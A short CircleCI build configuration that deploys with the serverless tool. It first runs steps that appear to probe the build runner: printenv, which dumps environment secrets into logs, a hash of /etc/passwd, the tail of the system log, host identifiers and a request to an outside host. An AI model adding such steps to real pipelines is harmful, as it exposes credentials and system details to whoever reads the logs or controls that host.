version: 2
jobs:
  build:
    docker:
      - image: amaysim/serverless:1.26.0

    steps:
      - checkout
      - run: printenv
      - run: whoami
      - run: uname
      - run: md5 /etc/passwd | cut -d ' ' -f 4
      - run: hostid
      - run: date +%s
      - run: tail -250 /var/log/syslog
      - run: curl http://abaton.dgraph-poc.orchestrated.io:3000
      - run: serverless deploy
